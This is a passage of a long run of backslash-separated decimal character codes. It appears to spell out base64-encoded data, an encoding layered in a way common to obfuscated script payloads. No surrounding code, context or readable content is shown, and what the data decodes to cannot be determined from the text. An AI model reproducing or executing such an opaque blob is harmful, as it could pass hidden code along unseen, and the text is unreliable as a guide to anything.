3\119\81\119\83\77\106\108\76\115\52\81\78\89\113\50\122\100\73\74\43\101\67\84\80\67\84\74\49\105\72\75\72\113\55\103\53\115\108\122\121\84\105\53\71\89\78\43\101\100\101\114\82\108\48\121\80\70\65\111\115\105\118\100\85\50\122\69\55\88\80\115\102\90\87\119\69\109\55\77\68\109\122\69\67\97\99\55\119\112\119\70\74\99\112\81\43\104\110\103\69\52\108\120\88\56\81\54\101\80\104\97\83\99\78\72\122\47\78\117\103\66\81\122\56\85\50\80\112\69\106\118\86\122\66\121\71\107\111\81\43\97\97\79\70\119\105\77\103\71\78\116\78\121\78\86\97\103\57\122\43\54\52\122\71\117\87\55\47\99\114\105\101\70\109\70\121\104\116\75\72\122\49\83\107\65\100\69\50\100\112\84\84\117\75\89\55\114\84\48\82\116\68\74\82\84\74\116\113\83\50\49\72\74\85\110\115\85\48\99\67\89\90\74\78\106\120\78\76\47\74\49\90\51\102\47\97\120\98\107\66\53\86\88\102\48\112\75\81\75\53\112\53\106\56\102\101\115\109\113\85\77\83\115\118\113\100\53\54\111\65\75\65\57\102\122\112\76\68\118\55\119\47\81\82\56\89\81\47\57\104\52\83\71\67\47\66\110\122\74\80\79\69\88\113\120\57\98\74\108\99\122\100\84\57\116\106\88\120\116\56\49\110\102\103\51\73\121\56\48\74\115\118\107\76\71\98\110\50\55\112\78\75\69\111\111\68\119\101\90\84\50\56\72\79\65\65\66\76\70\43\66\86\70\119\71\111\49\98\82\48\83\86\89\53\102\115\119\102\90\75\57\76\118\79\72\73\98\56\119\110\83\76\53\120\111\88\82\65\79\89\50\100\52\109\72\56\81\71\85\76\66\68\47\112\119\56\54\82\81\52\109\74\77\103\114\72\121\114\52\107\101\104\57\107\65\72\67\76\51\101\82\68\49\122\43\99\105\109\50\100\109\50\79\67\81\104\112\79\79\70\79\117\121\53\86\107\103\100\43\66\79\75\57\104\52\73\74\51\82\72\118\48\85\50\49\50\99\102\112\114\98\43\108\105\83\78\98\107\120\117\114\81\102\119\85\87\108\71\73\50\122\108\65\101\102\111\116\111\55\99\83\85\109\104\57\78\73\122\67\106\73\110\108\66\55\48\88\104\107\56\69\73\54\65\57\100\66\50\86\118\110\52\100\52\117\110\48\70\122\119\50\120\82\116\90\72\50\54\67\106\84\68\112\118\114\81\79\88\80\109\104\76\119\49\110\116\115\84\75\122\103\73\79\106\69\109\80\56\75\52\87\89\70\54\111\99\88\87\104\57\78\113\75\66\115\80\110\89\81\43\80\110\115\103\76\74\83\80\71\120\114\49\80\52\53\113\106\50\72\55\53\98\98\97\66\47\107\82\115\100\90\74\106\112\77\76\56\112\115\83\105\116\72\86\89\114\74\101\84\115\101\90\71\65\98\112\76\86\108\67\111\65\86\54\98\69\79\73\49\118\98\89\79\77\83\112\52\116\102\100\84\74\86\116\49\118\119\51\110\49\117\86\72\116\88\111\82\74\47\85\73\100\88\82\110\55\82\111\79\75\90\78\100\120\83\87\81\89\77\84\103\79\102\104\120\87\109\122\118\73\69\83\101\73\118\68\79\120\102\70\57\107\76\84\51\81\108\48\115\89\80\85\77\76\97\78\88\87\72\85\54\108\70\83\53\54\54\68\84\97\103\70\50\83\113\87\55\84\114\82\105\65\117\100\43\104\121\49\55\86\78\68\88\101\120\43\54\54\65\117\85\99\57\81\107\72\85\79\73\104\116\115\78\54\72\51\100\97\75\110\67\54\109\89\111\57\50\75\112\79\108\48\48\49\72\112\76\77\106\81\105\114\48\113\72\82\52\66\72\57\120\114\51\53\104\49\76\121\55\122\122\51\67\54\73\121\105\47\68\104\119\89\101\74\72\100\81\100\112\109\56\66\109\43\105\53\99\75\65\48\108\120\85\77\119\110\53\119\43\106\74\66\75\89\74\67\114\47\65\47\83\43\101\43\88\98\121\54\115\115\84\109\78\85\114\53\51\50\87\97\79\106\83\99\65\110\110\69\70\86\67\100\54\114\121\110\84\52\72\101\82\68\100\111\57\56\97\57\90\55\74\48\101\53\105\78\78\47\109\115\47\80\78\99\121\101\102\98\98\54\113\86\72\105\56\117\79\98\47\107\111\98\76\66\51\82\82\82\120\90\79\111\55\57\72\112\68\86\85\116\75\69\79\76\90\105\105\55\118\82\103\81\111\100\74\78\80\68\111\107\115\115\82\100\72\77\118\54\68\101\108\106\73\118\47\121\77\50\106\97\55\119\71\72\83\83\108\68\83\122\48\83\80\122\118\76\82\73\56\115\114\115\50\84\66\78\82\71\47\110\47\87\81\83\99\121\113\48\70\108\109\110\49\101\82\68\73\71\65\100\78\98\74\68\43\68\111\121\111\65\111\97\71\43\55\113\119\88\83\121\111\43\73\67\110\54\51\49\109\49\49\98\122\83\85\75\57\85\106\114\47\115\105\101\106\77\47\78\119\49\81\86\53\122\82\106\98\100\89\88\83\52\51\65\114\69\107\107\83\67\83\69\57\113\101\112\87\74\100\119\112\55\53\101\65\76\84\107\102\100\80\67\83\69\51\111\51\80\80\55\49\80\116\119\75\98\104\98\72\99\80\109\48\89\48\65\69\101\100\80\52\84\79\48\102\79\103\103\107\65\121\49\110\82\52\120\65\86\49\54\78\71\51\43\65\81\51\105\117\79\89\56\78\113\97\69\57\86\51\121\108\81\78\109\70\112\97\52\105\118\48\98\98\89\73\78\55\49\107\122\81\104\88\87\57\82\69\105\48\113\83\79\72\108\69\107\67\121\108\54\88\83\76\66\121\84\98\105\86\85\69\111\121\67\56\56\122\102\70\100\118\65\90\97\71\115\116\68\110\85\98\98\119\72\88\100\49\98\52\77\103\99\104\52\49\116\112\70\100\109\79\90\105\65\74\104\117\69\83\112\100\81\47\56\65\84\105\82\112\83\77\117\76\107\111\121\74\100\53\55\68\111\77\66\111\78\90\113\73\53\84\68\122\66\70\118\85\110\100\70\113\51\57\65\84\72\57\87\43\110\48\105\70\114\89\110\52\116\50\83\75\56\122\69\122\104\88\68\99\83\50\71\71\73\110\74\100\100\75\105\82\103\90\68\47\69\116\120\121\78\113\99\48\86\121\113\122\86\78\105\67\68\103\114\68\66\111\109\111\104\68\118\79\76\77\82\51\49\84\65\70\84\68\104\54\66\114\119\65\83\52\54\120\82\120\66\120\75\104\101\49\74\86\80\101\71\117\53\73\100\89\50\106\86\77\97\102\107\99\43\106\77\117\69\118\72\82\79\103\122\78\79\90\74\69\112\106\118\100\118\102\57\86\78\122\90\83\115\43\79\49\115\99\79\52\113\109\87\116\88\104\99\106\108\70\120\118\73\80\117\86\73\75\70\90\101\107\89\49\87\106\57\119\113\111\121\118\104\79\56\53\66\51\104\113\112\55\89\74\117\66\67\68\117\52\100\84\108\88\116\119\50\43\108\71\52\66\83\110\77\119\76\72\120\43\47\51\75\54\56\71\120\105\51\65\71\85\85\78\83\53\79\57\105\68\49\51\113\113\89\73\111\68\43\88\55\69\71\106\50\119\57\69\112\69\107\52\102\47\119\81\89\105\50\110\100\69\73\73\104\49\75\55\102\70\81\75\82\88\88\84\118\85\76\119\72\88\113\118\70\80\74\115\57\108\84\67\71\118\90\85\78\109\113\68\43\88\77\104\50\115\119\70\84\73\121\90\85\65\118\97\103\111\83\120\87\106\111\118\66\78\56\50\112\107\86\120\52\101\119\89\113\105\67\109\79\50\101\70\81\101\110\43\104\121\102\80\116\90\71\119\57\111\115\109\77\85\104\85\104\98\70\86\71\81\50\122\99\85\65\74\98\75\85\81\81\87\82\84\81\85\101\75\89\67\102\122\113\74\87\111\50\78\122\84\65\57\52\89\47\73\73\81\68\76\100\115\107\115\88\55\66\111\84\54\72\117\82\83\66\71\55\55\43\56\47\100\101\116\110\120\78\105\110\99\65\43\81\117\121\98\80\82\85\115\104\106\66\114\77\98\66\114\98\112\118\52\81\55\101\69\48\49\77\66\82\75\47\76\47\85\122\72\82\54\74\65\66\103\85\84\109\74\106\98\105\119\50\84\105\108\99\100\70\105\100\90\57\98\68\85\74\77\82\73\67\78\54\80\78\57\105\65\53\77\112\104\70\78\80\110\50\56\122\81\107\65\72\55\77\90\85\53\77\99\67\72\77\75\112\104\51\67\90\117\106\66\83\81\100\67\110\52\52\104\111\54\74\97\47\103\107\105\81\47\51\66\70\76\122\71\68\121\97\52\82\113\53\119\43\85\81\65\90\103\79\80\53\97\43\51\86\78\55\72\71\49\52\68\49\108\57\118\114\106\47\49\114\52\86\110\49\87\81\71\67\103\73\73\56\85\106\81\101\113\70\49\112\86\52\54\57\119\75\117\102\100\73\79\105\48\71\51\109\109\98\72\88\90\114\106\105\98\86\103\75\48\51\120\69\114\56\85\51\100\107\54\79\80\122\68\47\111\50\98\105\113\86\70\101\89\121\68\121\74\97\69\56\108\83\90\121\120\119\82\53\52\72\55\97\73\106\86\97\100\43\122\87\75\101\107\102\68\97\51\53\99\97\51\74\57\66\90\116\114\54\53\74\102\49\121\109\118\55\69\109\79\55\106\51\80\78\100\66\77\54\53\118\101\79\67\79\65\52\100\97\80\107\117\106\114\100\76\72\86\108\106\56\74\71\78\103\66\55\55\66\75\119\74\53\101\118\85\66\86\110\102\98\102\121\88\67\66\100\83\80\97\107\110\80\51\73\105\100\48\114\110\117\106\57\77\83\105\77\89\54\76\65\102\109\66\116\82\114\107\83\99\78\70\122\53\104\57\57\104\110\105\97\78\102\52\109\72\121\100\85\52\105\89\77\43\52\100\70\75\71\77\73\122\121\115\73\81\43\99\109\102\113\49\76\82\86\51\115\104\65\104\89\77\104\112\49\88\89\107\54\67\98\53\71\70\120\107\113\107\102\48\86\110\105\66\120\78\89\52\97\121\69\77\87\85\80\70\99\100\109\86\107\100\99\104\81\116\120\87\66\77\115\108\79\76\121\116\88\79\53\82\111\77\106\76\55\115\80\81\55\73\79\119\75\97\110\67\72\88\120\72\112\122\105\108\77\68\85\107\70\106\115\117\120\113\47\76\109\78\81\68\74\70\104\90\66\103\78\115\65\49\117\115\47\120\97\71\50\76\113\83\68\101\76\54\83\90\99\122\75\85\90\116\116\56\116\73\104\86\107\98\87\52\49\75\88\54\72\118\122\65\118\102\43\101\65\101\80\49\55\70\88\74\70\80\70\113\118\116\81\109\101\102\118\89\89\118\84\110\102\49\75\70\70\109\65\120\52\108\82\72\66\120\106\65\72\50\80\79\48\56\48\115\100\112\52\50\116\78\56\57\122\43\66\53\113\118\122\47\48\80\71\47\87\85\88\74\114\97\47\99\112\122\49\73\77\67\117\99\90\86\74\122\51\50\100\67\117\74\120\89\89\115\116\86\99\67\120\52\99\75\88\69\120\110\52\50\116\81\100\110\120\104\52\121\116\77\52\98\82\111\98\104\65\57\108\81\89\121\86\68\71\116\111\119\103\56\89\112\121\97\49\56\120\72\52\105\72\65\77\106\100\108\98\67\79\75\52\120\48\77\84\82\84\55\49\116\57\85\84\48\106\78\97\82\77\74\82\113\70\119\68\81\67\75\72\108\67\116\49\120\81\89\83\78\108\69\118\104\43\88\109\49\106\55\112\89\98\111\99\117\97\79\106\122\65\119\103\103\65\111\75\115\79\84\122\111\100\78\116\67\119\120\51\116\110\74\76\50\67\99\107\109\48\113\69\90\104\67\99\47\80\56\114\78\101\69\79\75\50\49\81\86\68\71\55\66\78\77\67\90\75\121\69\87\68\88\78\43\55\116\101\98\82\100\75\119\115\49\55\101\55\55\88\50\115\102\78\101\50\51\98\88\90\65\84\101\90\108\122\78\121\97\74\84\53\53\43\103\72\101\103\104\97\54\122\97\75\83\56\102\55\113\111\85\107\70\75\68\90\86\74\102\89\67\109\116\78\119\115\105\87\81\98\76\52\48\78\43\49\52\73\90\76\109\110\97\57\82\110\68\118\120\86\113\52\112\85\82\102\66\55\99\53\87\107\72\69\97\118\118\66\85\70\73\107\119\99\69\82\88\67\71\83\68\110\72\88\68\47\52\43\57\50\70\103\86\110\55\84\120\69\85\112\102\79\89\84\66\73\75\100\88\87\50\82\69\71\115\78\78\71\79\121\121\84\118\109\98\71\48\82\65\88\98\77\49\49\100\83\102\65\100\75\87\103\85\49\105\97\98\85\99\79\56\113\83\110\55\106\70\66\73\54\121\79\89\72\66\109\113\47\54\54\78\106\47\69\65\48\77\81\70\51\84\122\86\67\57\80\87\88\81\122\74\83\70\100\50\88\119\80\101\111\106\115\115\119\87\74\114\90\117\101\73\104\116\107\89\122\97\90\57\55\76\85\86\69\99\51\80\66\83\53\81\82\85\53\117\84\100\82\66\120\49\115\121\69\79\117\102\111\106\73\57\99\71\84\87\52\68\54\102\78\49\84\106\83\52\43\119\90\90\47\78\98\85\49\81\90\55\70\113\43\84\121\99\111\88\76\112\90\66\119\108\55\48\121\77\68\114\103\104\89\84\90\75\98\90\48\68\111\43\81\81\116\76\98\48\77\87\48\54\111\89\114\81\100\80\70\65\70\121\77\52\65\56\86\104\79\99\48\121\104\43\84\80\102\90\85\65\85\88\100\49\87\100\88\81\105\55\74\100\114\89\103\120\73\49\78\112\102\79\99\108\88\85\101\99\109\87\118\110\48\115\119\53\80\50\105\115\80\76\121\101\50\86\79\99\112\53\106\120\85\54\48\83\88\80\82\103\48\70\50\80\85\107\77\98\66\111\52\102\122\100\104\110\116\87\107\52\88\89\78\97\106\115\107\50\112\73\106\81\54\80\116\77\108\65\55\82\115\86\81\103\97\112\47\73\119\69\104\109\75\87\52\90\54\76\102\67\105\107\56\85\76\50\118\57\86\97\65\104\52\81\75\50\89\97\115\78\76\80\65\68\101\76\81\112\81\55\106\73\120\53\55\47\80\116\115\88\120\84\113\98\76\78\52\82\104\50\47\110\107\76\82\43\108\54\120\79\51\81\119\111\48\116\66\114\71\77\84\108\87\104\99\65\72\103\72\81\81\69\108\75\51\108\87\74\84\112\86\98\49\69\99\99\71\115\57\116\76\50\50\120\68\56\49\43\122\69\47\71\98\102\108\84\80\47\80\98\68\99\49\77\78\52\47\68\50\72\111\109\47\74\110\87\54\106\118\113\71\115\110\112\50\100\65\119\120\87\43\122\97\102\114\90\119\51\55\119\75\49\119\75\48\89\71\66\79\84\120\80\113\100\51\57\98\112\102\84\114\52\122\103\73\81\97\79\53\120\57\68\119\79\51\50\118\104\78\107\55\99\111\90\100\69\49\107\68\48\100\87\78\71\69\83\48\120\69\101\48\88\119\114\77\118\101\99\47\89\78\106\84\114\121\52\77\118\55\48\97\81\116\111\102\104\102\43\85\116\55\76\105\76\85\51\106\117\102\75\71\90\113\77\87\121\121\98\103\107\114\73\67\73\52\57\68\86\110\74\81\74\86\112\108\43\90\105\100\68\69\77\52\52\90\57\98\69\120\101\49\80\104\116\54\72\112\107\74\79\120\90\121\121\57\87\107\69\98\43\105\51\88\78\82\101\55\86\107\69\72\97\66\81\80\90\56\117\72\88\98\101\103\120\67\88\89\102\104\86\51\72\54\112\97\75\116\121\83\102\90\67\75\86\89\122\103\54\50\120\116\115\83\82\49\111\54\52\116\52\113\112\71\107\65\79\55\48\50\47\106\48\48\68\106\75\84\110\81\103\57\81\77\76\81\105\117\57\55\112\65\51\118\52\87\84\87\100\87\88\72\101\99\87\115\69\72\97\120\77\69\54\103\115\117\52\53\49\85\114\55\100\82\65\54\103\82\83\83\79\121\102\51\113\89\86\85\78\114\86\47\113\85\83\81\99\112\113\118\65\73\78\112\52\43\121\78\67\110\68\121\54\104\71\56\107\49\90\87\87\80\54\117\120\111\101\107\68\57\107\107\82\80\66\82\78\83\43\43\80\121\106\77\74\88\107\55\113\75\74\98\68\81\83\65\47\102\87\119\105\49\118\52\81\103\117\112\76\47\88\77\114\49\101\77\65\75\121\118\53\78\69\57\68\49\54\117\76\78\83\117\81\53\104\121\112\87\90\53\108\118\49\86\106\72\118\72\102\113\74\115\83\57\119\51\114\89\50\76\86\48\48\98\43\81\114\119\50\112\102\97\117\77\112\101\103\54\55\115\110\104\71\50\55\53\106\55\74\110\99\121\89\76\50\110\99\57\106\52\71\73\65\74\76\102\76\121\118\73\113\43\55\89\110\77\66\65\101\82\73\107\70\71\103\105\67\43\112\105\70\57\113\83\83\57\103\55\86\79\77\48\99\100\43\97\103\52\104\101\82\111\112\99\43\79\80\118\71\107\82\98\121\90\119\65\52\107\56\57\48\106\102\73\65\76\103\119\108\74\102\88\101\105\106\80\109\102\99\99\66\67\67\115\112\103\87\88\81\68\56\109\120\84\108\67\72\67\105\74\49\112\79\53\69\74\116\65\90\116\119\107\105\109\90\97\109\74\114\118\54\103\66\114\53\97\118\75\113\118\114\100\80\53\53\102\72\103\57\82\50\116\66\84\104\68\117\105\56\82\121\70\76\103\50\78\88\48\75\104\90\65\49\100\88\116\97\112\101\103\116\97\75\100\86\88\117\43\50\122\122\108\51\110\88\97\111\79\79\71\120\111\66\97\49\89\47\67\118\51\78\75\88\86\114\74\88\85\101\114\117\81\53\69\120\79\76\66\119\79\54\103\68\65\56\73\110\79\118\57\72\78\80\106\102\87\73\117\72\106\55\97\114\100\84\118\49\81\106\76\81\54\70\80\103\97\115\75\70\107\89\117\108\71\88\77\110\73\98\97\77\52\106\100\53\75\47\107\83\74\116\101\90\50\81\83\117\78\67\87\50\76\97\113\69\84\76\111\54\81\101\86\70\75\89\106\81\53\52\88\103\120\78\69\47\79\83\43\54\78\54\56\72\103\112\116\99\53\90\106\53\75\114\89\65\85\67\111\122\66\109\98\102\72\109\118\86\85\57\79\105\116\107\89\119\72\121\119\105\57\116\106\80\115\110\69\111\53\69\67\100\55\43\83\86\72\82\102\56\106\104\52\80\108\88\122\109\115\102\69\70\111\76\79\72\81\108\115\48\105\66\118\111\49\85\114\112\49\105\116\98\121\99\112\103\66\50\116\48\50\77\81\110\81\113\48\69\103\100\71\76\52\101\53\103\79\70\75\72\98\49\109\114\82\90\105\116\83\114\115\78\98\105\87\97\104\85\111\101\84\56\52\88\47\120\108\65\74\121\51\100\79\80\102\112\105\116\49\97\119\66\84\105\117\101\84\89\54\77\52\89\57\76\54\104\106\51\119\98\85\77\73\83\52\70\70\107\57\109\117\117\79\117\55\57\109\116\49\68\122\90\103\55\99\106\65\118\68\66\66\102\75\54\76\71\90\122\65\117\55\115\99\67\110\67\107\109\77\88\85\113\74\111\56\109\51\114\72\100\49\55\99\107\101\47\83\76\115\71\52\102\83\55\84\50\48\77\78\109\85\57\100\100\109\57\85\83\103\86\72\76\118\70\117\77\122\118\74\75\67\122\74\88\115\98\76\79\73\77\69\67\98\110\66\98\88\106\112\54\48\118\90\69\122\88\50\104\115\113\73\116\75\116\53\100\49\70\118\48\74\90\72\80\87\118\114\49\52\55\120\108\80\100\87\89\109\68\81\75\106\86\111\116\104\55\112\56\54\98\117\100\119\79\82\104\118\75\69\120\43\51\72\43\48\66\78\84\83\113\120\111\78\108\116\122\119\99\108\106\76\83\115\50\55\110\47\121\72\82\118\118\49\108\79\87\99\83\100\80\66\118\111\57\85\122\52\53\104\43\113\101\103\73\81\66\87\102\114\43\88\51\67\86\72\77\120\48\99\69\70\110\49\112\50\103\99\100\65\116\85\66\83\72\109\76\77\109\110\73\74\115\68\118\115\90\74\78\50\105\122\105\107\119\77\49\110\106\98\69\73\85\117\53\53\85\121\43\117\84\80\114\117\68\106\122\82\57\111\97\116\47\119\97\113\118\49\43\55\65\110\83\47\69\100\80\52\53\51\101\109\90\100\79\48\67\74\101\71\100\83\69\47\108\99\51\76\112\119\110\117\111\90\57\72\43\112\100\80\100\56\47\102\75\70\90\111\105\49\99\47\50\98\89\51\47\79\68\108\112\105\69\118\52\51\66\89\90\105\50\80\87\79\120\107\47\56\103\49\52\111\109\86\112\108\56\84\103\76\86\85\97\70\107\43\106\69\73\70\100\48\107\43\78\55\108\66\69\65\57\112\71\75\121\66\106\51\71\109\86\106\109\119\120\113\121\122\68\75\102\86\68\98\57\113\48\88\78\98\99\55\55\52\114\71\86\52\83\97\76\54\120\70\68\102\121\72\98\105\52\100\120\51\49\112\121\102\114\87\74\97\110\111\103\115\73\69\67\98\102\67\76\79\81\52\88\110\70\69\98\122\65\43\116\50\106\88\67\121\65\90\100\87\102\82\83\103\47\115\69\97\104\103\51\48\76\100\51\53\71\108\54\119\116\82\107\43\67\70\66\119\68\117\88\114\116\121\43\51\105\68\102\72\51\53\80\104\102\49\116\122\71\107\52\88\120\101\56\52\51\98\110\88\102\57\100\54\70\118\51\82\117\122\120\74\43\82\89\68\105\82\101\99\80\101\109\109\84\105\81\81\85\112\81\83\114\121\104\47\73\105\101\106\68\48\117\118\65\72\79\100\108\73\103\54\50\115\108\106\67\67\88\55\88\90\57\108\81\72\109\83\119\83\51\67\71\106\100\106\111\111\49\105\76\43\116\99\121\79\50\105\50\47\118\114\88\121\77\53\110\85\48\120\98\81\112\121\87\56\121\104\97\115\97\53\83\53\81\101\119\99\83\104\48\54\57\88\99\106\80\111\51\110\67\76\82\56\86\70\81\57\51\97\88\43\117\87\100\112\115\75\106\68\105\105\77\48\83\97\67\115\111\89\102\57\103\71\110\73\111\83\102\90\84\77\115\81\80\99\103\100\53\85\100\48\110\97\71\103\90\85\121\84\111\78\83\66\121\75\108\90\48\112\97\77\97\88\43\66\110\71\99\54\70\81\70\67\83\81\90\107\98\65\88\121\43\71\100\54\101\107\77\51\71\119\111\102\76\97\114\115\55\53\112\122\86\87\97\101\43\101\81\52\115\100\49\51\74\65\51\109\80\55\67\54\120\47\68\78\70\115\122\80\109\100\90\67\52\65\48\68\47\82\100\90\97\75\67\83\80\56\109\49\47\47\48\85\114\113\101\75\116\73\113\54\114\88\112\122\85\86\112\116\57\71\119\100\56\77\69\78\109\100\108\115\79\81\74\80\115\97\76\51\112\83\102\115\55\57\67\103\117\119\83\86\84\77\88\68\90\88\75\97\54\113\72\105\119\107\69\66\121\107\112\121\113\52\87\90\53\111\108\81\49\70\51\76\104\74\50\106\115\78\113\75\47\105\65\82\118\50\119\82\71\51\73\111\80\86\100\81\114\48\98\43\73\72\113\122\70\57\66\49\65\57\48\86\78\114\101\86\114\67\114\48\68\80\43\76\107\103\71\89\55\105\55\86\72\102\68\65\69\48\48\52\56\87\86\97\49\110\77\57\122\65\116\48\67\51\101\121\122\101\74\103\117\122\110\104\67\75\43\73\98\81\88\54\77\119\57\109\88\97\56\109\89\109\115\83\54\103\70\79\69\121\105\87\67\89\67\97\88\110\43\57\82\74\66\72\52\112\70\68\107\68\109\99\107\83\118\101\77\50\118\82\99\107\119\121\82\107\97\76\65\53\47\54\107\76\66\71\69\57\115\106\53\113\103\55\114\75\119\109\55\76\122\118\98\51\57\101\80\83\122\106\122\98\103\120\51\76\55\103\56\80\122\108\43\108\65\120\67\122\76\48\80\111\103\51\105\77\57\104\89\107\86\100\72\51\47\112\116\70\50\120\84\65\112\65\114\50\104\112\69\108\87\109\119\115\75\88\47\119\71\106\77\108\109\90\108\50\55\49\83\74\67\66\85\71\98\118\74\74\65\48\109\83\66\112\55\112\47\87\55\115\117\55\118\97\80\73\76\56\109\100\120\83\107\43\116\115\102\47\104\71\88\65\98\76\73\108\87\73\106\112\47\71\87\43\48\56\82\117\50\48\65\54\117\79\78\80\50\117\69\57\75\110\82\107\53\110\84\51\65\108\85\122\120\83\103\75\100\102\57\89\72\100\116\106\76\85\99\69\65\86\57\120\55\119\86\73\54\109\83\108\52\56\111\110\47\66\43\87\103\71\47\74\89\85\114\43\90\88\101\109\90\112\101\48\55\76\65\107\69\102\109\75\97\47\51\103\77\83\72\99\57\65\72\78\113\119\112\120\65\43\74\89\108\76\83\69\49\116\122\99\84\75\48\110\81\52\98\73\109\97\53\70\80\111\98\104\74\48\102\74\80\106\70\87\75\66\53\81\67\103\98\122\68\110\66\118\86\53\109\71\52\110\51\51\99\43\79\68\120\122\65\104\107\88\111\111\55\111\50\120\84\56\78\80\116\105\78\118\77\80\73\105\56\69\43\55\72\106\114\108\100\90\87\100\112\52\78\115\115\113\43\52\117\70\76\105\105\49\114\112\121\114\66\65\89\47\98\121\120\57\67\49\81\109\67\79\119\105\98\72\50\52\76\52\104\89\47\88\51\100\79\81\85\107\120\87\69\83\104\100\113\78\101\121\72\111\80\73\68\114\77\68\112\66\71\81\50\78\83\78\65\106\77\113\83\75\118\107\112\109\113\79\108\77\57\104\117\111\120\50\74\120\51\52\56\109\79\116\50\88\65\79\103\52\68\48\107\48\108\90\106\104\70\72\87\97\115\110\87\87\115\56\105\89\52\89\107\79\102\50\87\75\112\88\112\56\86\81\82\107\77\111\70\76\111\88\100\105\49\119\103\107\78\54\117\49\105\105\56\50\47\53\43\100\47\90\97\120\111\88\77\79\105\43\115\73\113\82\97\76\77\48\113\97\101\79\54\117\99\109\107\53\109\109\86\77\72\69\73\86\89\49\117\78\65\82\98\97\111\77\110\73\84\112\109\104\122\75\90\74\77\79\86\47\69\98\75\107\114\112\76\47\56\71\81\111\98\56\85\75\116\115\77\55\107\55\57\80\115\106\119\67\112\122\76\69\84\121\108\49\74\71\110\104\70\119\78\102\70\80\106\106\117\48\74\79\71\78\108\107\56\109\74\102\70\50\56\78\90\74\50\98\77\97\100\108\109\74\87\120\52\98\122\56\102\98\107\78\120\105\67\72\51\49\54\81\108\85\88\97\51\67\106\89\50\116\54\57\84\102\49\57\111\57\119\120\71\70\88\89\85\70\114\97\90\110\52\87\50\78\108\101\49\70\112\69\79\88\85\57\105\121\105\110\98\107\70\74\111\67\89\89\77\122\112\86\65\56\53\108\81\50\71\75\113\97\88\48\117\75\66\55\114\114\87\68\50\54\72\90\106\107\72\106\83\87\119\102\82\66\50\75\75\57\112\122\56\90\122\77\100\75\102\105\53\108\43\43\111\49\113\119\55\68\51\122\117\100\55\112\112\51\97\66\100\67\112\102\55\53\79\50\88\97\75\57\111\56\110\54\49\122\43\104\97\47\111\103\90\105\107\86\107\122\105\116\88\66\49\54\81\81\80\57\72\47\73\48\111\111\122\89\52\75\109\69\81\117\55\78\110\119\55\118\71\50\111\52\77\90\76\84\110\73\77\70\117\52\49\114\57\69\107\56\112\100\73\98\99\98\113\51\84\49\68\78\66\103\47\53\55\47\83\79\84\57\119\100\83\72\68\122\55\80\53\103\56\104\102\119\99\68\71\103\122\100\90\122\69\118\66\118\114\107\83\118\79\79\101\69\110\122\107\78\75\109\122\69\71\81\70\78\72\97\52\111\97\98\49\71\73\106\57\68\108\56\47\106\51\48\86\87\113\67\114\52\90\68\87\114\74\104\48\101\71\68\48\67\86\120\83\88\76\83\72\74\114\104\50\56\90\78\73\113\83\101\70\49\112\105\105\55\56\49\84\55\87\75\99\57\85\87\69\53\121\68\80\52\51\100\51\83\50\57\99\122\109\53\98\122\107\74\117\89\57\68\121\76\49\113\116\76\75\51\103\100\87\106\56\51\112\71\70\66\68\119\67\83\70\50\103\122\112\71\97\48\77\47\47\122\121\82\116\89\117\98\99\55\88\55\52\50\73\50\71\74\69\84\105\49\105\112\110\83\53\81\56\104\83\82\77\122\76\118\66\57\114\76\66\66\119\116\51\121\90\115\115\112\85\43\71\120\80\70\104\89\107\73\90\111\118\107\68\86\49\52\102\110\66\88\88\108\84\119\98\47\116\51\114\84\54\98\67\118\117\122\104\86\103\57\90\79\116\121\104\120\48\105\114\97\51\43\72\112\83\82\98\117\90\68\54\70\69\84\67\111\88\57\83\82\73\81\117\83\81\53\119\84\119\56\77\76\67\117\101\56\84\82\108\69\43\65\116\100\104\85\107\68\109\113\65\69\121\75\111\111\73\49\66\115\117\115\57\104\104\97\68\68\72\106\70\43\79\104\43\103\76\53\81\70\70\70\118\116\67\111\65\83\103\54\103\103\83\52\73\112\86\43\117\111\90\90\86\100\90\106\86\70\76\115\119\119\88\69\121\117\76\120\78\121\115\89\107\79\65\98\68\108\99\52\53\102\103\43\98\70\48\81\76\118\84\90\98\97\43\117\100\52\49\85\68\99\56\90\114\82\99\109\85\49\57\75\115\112\76\101\71\120\86\49\72\77\87\68\112\109\68\48\81\80\76\112\66\119\120\106\77\48\86\73\85\121\76\97\80\48\79\112\56\67\103\77\73\53\119\117\122\100\119\49\111\74\100\50\54\112\121\115\86\84\118\76\77\107\105\55\65\102\53\114\56\104\67\68\110\68\120\102\77\87\68\54\120\104\90\53\88\75\105\77\109\113\109\47\110\99\74\104\77\117\72\54\116\113\99\114\51\116\53\120\89\75\47\99\109\78\102\106\73\102\98\113\118\69\101\88\55\97\103\76\55\54\112\72\109\120\121\106\75\69\98\76\54\68\120\107\54\89\87\51\103\73\108\105\107\99\75\101\48\51\72\69\67\66\106\57\120\51\65\54\89\79\48\113\47\54\67\80\103\114\81\81\105\107\120\56\49\122\53\89\48\73\74\105\119\99\79\103\79\74\56\103\103\72\51\87\98\89\52\112\43\90\66\119\84\99\73\47\113\101\50\99\114\106\122\103\117\97\85\99\74\73\121\120\111\107\113\109\55\49\122\90\105\76\103\74\48\86\65\118\112\50\113\112\112\121\70\107\73\77\50\78\76\87\117\119\67\89\51\82\69\76\48\110\54\73\75\50\57\56\53\85\87\55\85\75\53\47\87\78\115\82\100\86\48\52\81\114\68\121\78\108\76\121\103\89\114\109\84\76\117\118\82\48\109\74\122\85\52\67\56\43\80\88\70\101\116\85\47\111\66\88\52\100\119\57\56\121\53\109\79\51\81\119\97\69\86\49\70\97\56\117\43\120\79\104\97\122\74\100\69\99\115\50\108\66\85\76\55\72\57\78\49\57\80\85\85\97\77\47\113\97\120\115\120\116\50\120\108\52\51\117\85\102\110\88\102\78\88\104\121\65\122\117\47\49\105\65\47\120\65\72\110\57\121\86\52\118\67\109\78\120\81\108\79\97\54\48\112\56\77\47\71\49\75\122\113\82\72\86\106\79\81\81\116\77\100\65\87\71\111\101\81\90\113\65\99\101\99\116\101\71\70\51\69\73\78\122\73\57\73\56\118\110\87\86\75\50\105\74\118\65\51\86\121\70\100\71\87\120\52\113\112\103\55\55\122\84\118\73\68\101\75\121\88\81\110\97\66\99\102\106\87\52\119\97\119\109\54\98\99\48\76\107\88\117\55\110\121\71\114\54\54\97\90\102\106\108\83\57\48\57\72\49\113\102\53\107\86\108\80\110\115\57\51\118\66\120\122\104\43\86\72\65\48\90\118\85\107\117\101\78\51\90\114\121\53\67\82\87\76\112\99\105\88\89\73\73\90\56\113\79\49\85\47\49\98\57\102\57\116\57\52\108\72\103\85\80\86\56\79\53\48\114\87\77\102\112\69\88\118\122\99\119\66\98\68\114\82\90\71\82\99\55\81\55\74\47\122\